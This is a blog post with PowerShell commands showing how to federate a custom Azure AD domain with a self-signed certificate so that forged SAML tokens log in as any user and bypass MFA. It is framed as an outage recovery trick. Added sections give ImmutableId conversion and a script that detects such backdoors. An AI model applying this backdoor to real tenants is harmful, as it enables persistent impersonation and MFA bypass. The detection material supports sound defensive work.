How to create a backdoor to Azure AD

This Monday, Azure AD MFA was down for over 12 hours, preventing users from logging in to Office 365. As MFA is usually mandatory for administrators by company policy, they couldn't log in either. In this blog, I'll show how to create a backdoor to Azure AD so you can log in and bypass MFA.

Microsoft has pushed organisations to use Azure AD Multi-Factor Authentication (MFA) to increase the security of their cloud offering. This Monday the MFA service was down worldwide for over 12 hours.

How can admins log in if something similar happens? The answer is: using a backdoor. Here is how to create one.

Note! In this blog, I’m using the AADInternals PowerShell module.

Prerequisites

The backdoor utilises a known identity federation feature (arguably a vulnerability) I blogged about a year ago. To create a backdoor, you need:

  1. An admin user
  2. A custom domain
  3. An X.509 certificate
  4. An identity provider

An admin user

Naturally, the first thing you need is an administrator account. The backdoor requires that the account has its ImmutableId attribute set. If the account is synced from on-premises AD, the attribute contains the Base64-encoded objectGUID of the user's on-prem AD object. If the account is cloud-only, you need to set the value manually. It can be basically any string, as long as it is unique within the tenant.

To set the ImmutableId, use the following commands:

# Get AccessToken
Get-AADIntAccessTokenForAADGraph

# Set the ImmutableId
Set-AADIntUser -UserPrincipalName "admin@company.onmicrosoft.com" -ImmutableId "AADBackdoor"
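
The ImmutableId format described above, as an added PowerShell example (not from the original post or from AADInternals): it converts an on-premises objectGUID into the Base64 form Azure AD Connect writes, recovers the GUID from a synced account's value, and shows that a hand-set value such as "AADBackdoor" does not decode to a GUID at all. The objectGUID used below is made up.

```powershell
# Added example: ImmutableId <-> on-prem objectGUID conversion.
# Azure AD Connect sets ImmutableId to Base64(objectGUID bytes), so a synced
# account's ImmutableId can be mapped back to its on-prem AD object.

function ConvertTo-ImmutableId {
    param([Parameter(Mandatory)][guid]$ObjectGuid)
    # ToByteArray() yields the 16 bytes in the same layout AD stores in the
    # objectGUID attribute, which is what Azure AD Connect encodes.
    [Convert]::ToBase64String($ObjectGuid.ToByteArray())
}

function ConvertFrom-ImmutableId {
    # Returns the objectGUID for a synced account, or $null when the value is
    # not a Base64-encoded 16-byte GUID (i.e. it was set by hand, like "AADBackdoor").
    param([Parameter(Mandatory)][string]$ImmutableId)
    try {
        $bytes = [Convert]::FromBase64String($ImmutableId)
    } catch {
        return $null   # not valid Base64 at all
    }
    if ($bytes.Length -ne 16) { return $null }
    [guid]::new($bytes)
}

# Constructed sample: a made-up on-prem objectGUID
$onPremGuid  = [guid]'8a6e7f0c-3a2b-4d7e-9b1f-5c0d2e3f4a5b'
$immutableId = ConvertTo-ImmutableId -ObjectGuid $onPremGuid
"{0} -> {1}" -f $onPremGuid, $immutableId

# Round-trips back to the original GUID
ConvertFrom-ImmutableId -ImmutableId $immutableId

# A hand-set value does not decode to a GUID (prints True)
$null -eq (ConvertFrom-ImmutableId -ImmutableId 'AADBackdoor')

# For a cloud-only admin, prefer a random GUID-shaped value over a guessable
# string; the value only has to be unique within the tenant.
ConvertTo-ImmutableId -ObjectGuid ([guid]::NewGuid())
```

The last point matters for the note at the end of the post: anyone holding the signing certificate can log in as any user whose ImmutableId they know, and "AADBackdoor" is a lot easier to guess than 16 random bytes.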

A custom domain

Next, you need a verified custom domain that can be converted to federated (the default .onmicrosoft.com domain cannot be). You can get one for free from www.myo365.site.

A certificate

The next thing you need is a certificate. In Windows 10, you can easily create a self-signed certificate with PowerShell. If you are running an older OS, you can use MakeCert.exe or OpenSSL instead.

You can also create a certificate online, but those are generated by a third party, who then also holds the private key, and they should NEVER be used in production.

Create a certificate with following PowerShell commands:

# Create a new self-signed certificate and add it to your personal store
$cert = New-SelfSignedCertificate -DnsName "backdoor.company.com" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter (Get-Date).AddYears(100)

# Save the password to a variable
$certPwd = ConvertTo-SecureString -String "password" -Force -AsPlainText

# Export the certificate to .pfx file
Export-PfxCertificate -Cert $cert -FilePath "c:\mycert.pfx" -Password $certPwd

# Remove the certificate from the personal store
Remove-Item "cert:\CurrentUser\my\$($cert.Thumbprint)"

Identity Provider

The last thing you need is an identity provider. In this blog, I use the AADInternals PowerShell module, but any IdP supporting the WS-Federation protocol can be used, such as ADFS.

Create the backdoor

To create the backdoor, you set the authentication parameters of the chosen domain to match the IdP. For this, you need an issuer URI that is unique across all of Azure AD (not just your tenant) and the public key of the certificate.

# Extract the public key
$publicKey = [Convert]::ToBase64String($cert.Export("cert"))

# Set the issuer and login / logoff URI (the same value is used for all three here)
$uri="http://backdoor.company.com/"

# Set the domain authentication info
Set-AADIntDomainAuthentication -DomainName "backdoor.company.com" -Authentication Federated -IssuerUri $uri -PassiveLogOnUri $uri -LogOffUri $uri -SigningCertificate $publicKey

And that’s it, the backdoor is created and you’re ready to open it!

# Load the certificate from .pfx file
$signingCert=Get-AADIntCertificate -FileName "c:\mycert.pfx" -Password "password"

# Create an HTML page and open it in an Internet Explorer InPrivate session.
# The issuer must match the IssuerUri set on the domain exactly (including the trailing slash).
Open-AADIntOffice365Portal -ImmutableId "AADBackdoor" -Issuer "http://backdoor.company.com/" -Certificate $signingCert -ByPassMFA $true

You should now see an HTML page like the one below. Click the Login to Office 365 button to log in. You can also view the source of the page to see what the SAML token contains.

[screenshot: the generated login page with the Login to Office 365 button]

Afterword

Now you have a backdoor which you can use to access Office 365, even if the MFA service is down. Conditional Access may still block the access for other reasons, such as a policy requiring a compliant device.

Note! The backdoor allows you to log in as ANY USER of the tenant, as long as the user’s ImmutableId is known. So keep the certificate protected and safe!
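
The flip side of the note above is that every ingredient of the backdoor is visible in the tenant's domain federation settings, so a defender can look for it. The following is an added PowerShell example (not part of the original post or of AADInternals) that audits a domain's federation settings for the traits this backdoor leaves behind: a self-signed token-signing certificate, an absurdly long certificate lifetime, and plain-HTTP issuer and sign-in URIs. The property names are those returned by Get-MsolDomainFederationSettings from the MSOnline module; the offline demo feeds the function constructed settings that mirror the values used in this post.

```powershell
# Added example (not part of the original post or of AADInternals): audit a
# domain's federation settings for the traits the backdoor above leaves behind.
# Property names follow Get-MsolDomainFederationSettings (MSOnline module).

function Test-FederationSettings {
    param(
        [Parameter(Mandatory)][string]$DomainName,
        # Any object exposing IssuerUri, PassiveLogOnUri, SigningCertificate and
        # NextSigningCertificate, e.g. the output of Get-MsolDomainFederationSettings
        [Parameter(Mandatory)]$Settings
    )
    $findings = New-Object 'System.Collections.Generic.List[string]'

    # Token-signing certificate checks. An ADFS token-signing certificate is
    # normally valid for 1-5 years; a self-signed certificate with a decades-long
    # lifetime is exactly what the backdoor uses.
    foreach ($prop in 'SigningCertificate', 'NextSigningCertificate') {
        $b64 = $Settings.$prop
        if ([string]::IsNullOrEmpty($b64)) { continue }
        $cert  = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([Convert]::FromBase64String($b64))
        $years = ($cert.NotAfter - $cert.NotBefore).TotalDays / 365.25
        if ($cert.Subject -eq $cert.Issuer) { $findings.Add("$prop is self-signed: $($cert.Subject)") }
        if ($years -gt 5)                    { $findings.Add("$prop is valid for $([math]::Round($years)) years") }
    }

    # Endpoint checks. A real IdP publishes its sign-in endpoint over HTTPS; the
    # backdoor never needs a reachable endpoint, so any URL is accepted by Azure AD.
    foreach ($prop in 'IssuerUri', 'PassiveLogOnUri') {
        $value = [string]$Settings.$prop
        if ($value -match '^http://') { $findings.Add("$prop uses plain HTTP: $value") }
    }

    [pscustomobject]@{
        Domain     = $DomainName
        IssuerUri  = $Settings.IssuerUri
        Suspicious = ($findings.Count -gt 0)
        Findings   = $findings.ToArray()
    }
}

# Offline demo with constructed settings that mirror the backdoor above. The
# certificate is generated on the fly (Windows 10 / Server 2016 or later), so
# no tenant access is needed to run this part.
$demoCert = New-SelfSignedCertificate -DnsName 'backdoor.company.com' -CertStoreLocation 'cert:\CurrentUser\My' -NotAfter (Get-Date).AddYears(100)
Remove-Item "cert:\CurrentUser\My\$($demoCert.Thumbprint)"
$demoSettings = [pscustomobject]@{
    IssuerUri              = 'http://backdoor.company.com/'
    PassiveLogOnUri        = 'http://backdoor.company.com/'
    SigningCertificate     = [Convert]::ToBase64String($demoCert.Export('cert'))
    NextSigningCertificate = $null
}
Test-FederationSettings -DomainName 'backdoor.company.com' -Settings $demoSettings | Format-List

# Live use: run the same check over every federated domain in the tenant
# (requires the MSOnline module and a prior Connect-MsolService).
# Get-MsolDomain | Where-Object { $_.Authentication -eq 'Federated' } | ForEach-Object {
#     Test-FederationSettings -DomainName $_.Name -Settings (Get-MsolDomainFederationSettings -DomainName $_.Name)
# }
```

The demo reports Suspicious = True with four findings. Treat the findings as leads rather than verdicts: a legitimate third-party IdP may well use a non-ADFS certificate, but a self-signed certificate valid for a century on a domain nobody remembers federating deserves a look. Converting a domain to federated is also recorded in the Azure AD audit log (the "Set domain authentication" and "Set federation settings on domain" activities), which is the place to find out who made the change and when.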

About Dr Nestori Syynimaa
Dr Syynimaa works as a CIO of eight cities and municipalities surrounding Tampere, the largest inland city in Nordic countries. He also runs his own consultation business Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security in scientific and professional conferences. Dr Syynimaa holds MCSA (Office 365) and is Microsoft Certified Trainer.